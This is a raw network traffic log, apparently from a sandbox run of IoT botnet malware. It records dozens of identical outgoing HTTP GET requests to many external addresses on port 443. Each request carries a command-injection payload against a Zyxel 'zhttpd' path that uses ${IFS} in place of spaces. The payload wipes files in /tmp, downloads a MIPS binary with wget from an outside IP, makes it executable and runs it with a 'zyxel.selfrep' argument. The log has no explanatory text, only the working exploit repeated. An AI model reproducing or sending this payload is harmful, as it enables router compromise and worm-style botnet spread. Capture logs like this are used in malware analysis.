                                                        Jan 28, 2024 10:13:07.694183111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8135192.168.2.1459710177.215.157.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694226980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8136192.168.2.1447878198.103.118.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694248915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8137192.168.2.145630297.149.88.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694278002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8138192.168.2.1452374196.0.119.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694319963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8139192.168.2.1440076197.175.43.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694364071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8140192.168.2.143859275.16.218.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694403887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8141192.168.2.1446976217.164.212.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694444895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8142192.168.2.1456296210.18.233.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694478989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8143192.168.2.145367047.116.202.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694524050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8144192.168.2.143650070.129.25.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694555998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8145192.168.2.1449944198.148.53.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694575071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8146192.168.2.1460020118.236.222.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694613934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8147192.168.2.144417227.223.58.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694633007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8148192.168.2.143740054.180.37.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694672108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8149192.168.2.145983043.236.150.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694700003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8150192.168.2.1438674179.198.61.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694735050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8151192.168.2.145344857.141.10.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694791079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8152192.168.2.1450210128.72.116.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694833994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8153192.168.2.1454292216.192.216.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694861889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8154192.168.2.143874047.122.55.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694895983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8155192.168.2.1443178210.180.65.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694912910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8156192.168.2.144614849.249.108.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694958925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8157192.168.2.1435762181.50.237.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.694981098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8158192.168.2.1450102189.155.183.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695044994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8159192.168.2.143558480.100.228.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695094109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8160192.168.2.144500485.204.205.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695105076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8161192.168.2.1438914105.134.188.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695146084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8162192.168.2.144219043.202.49.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695188046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8163192.168.2.1439578183.104.211.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695224047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8164192.168.2.143345638.41.184.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695255995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8165192.168.2.1438010104.98.115.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695296049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8166192.168.2.1450074134.48.168.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695354939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8167192.168.2.1455764122.89.174.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695401907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8168192.168.2.144876267.240.140.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695420980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8169192.168.2.1453484177.145.116.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695451021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8170192.168.2.1454558142.209.25.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695476055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8171192.168.2.1457450172.143.137.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695497036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8172192.168.2.1448144201.0.60.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695528030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8173192.168.2.144848840.124.145.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695560932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8174192.168.2.144582812.39.42.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695600986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8175192.168.2.1436718190.251.66.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695635080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8176192.168.2.1454902165.117.104.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695703983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8177192.168.2.145972457.131.75.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695724964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8178192.168.2.1433812100.202.141.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695770025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8179192.168.2.145427459.170.22.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695828915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8180192.168.2.1459654192.67.137.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695859909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8181192.168.2.1450022121.134.241.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695884943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8182192.168.2.1451460151.31.122.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695939064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8183192.168.2.146020070.223.118.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.695970058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8184192.168.2.1442154205.114.63.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696014881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8185192.168.2.143888499.242.227.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696048021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8186192.168.2.14540441.30.27.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696065903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8187192.168.2.1453190119.35.160.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696094036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8188192.168.2.143850266.47.225.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696134090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8189192.168.2.1459834112.99.173.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696187019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8190192.168.2.1460866109.151.4.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696211100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8191192.168.2.1442558170.241.154.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696237087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8192192.168.2.144622890.190.87.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696280003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8193192.168.2.144672423.110.126.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696331024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8194192.168.2.1455268125.103.28.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.696357965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8195192.168.2.1445408103.74.162.6443
                                                        TimestampBytes transferredDirectionData
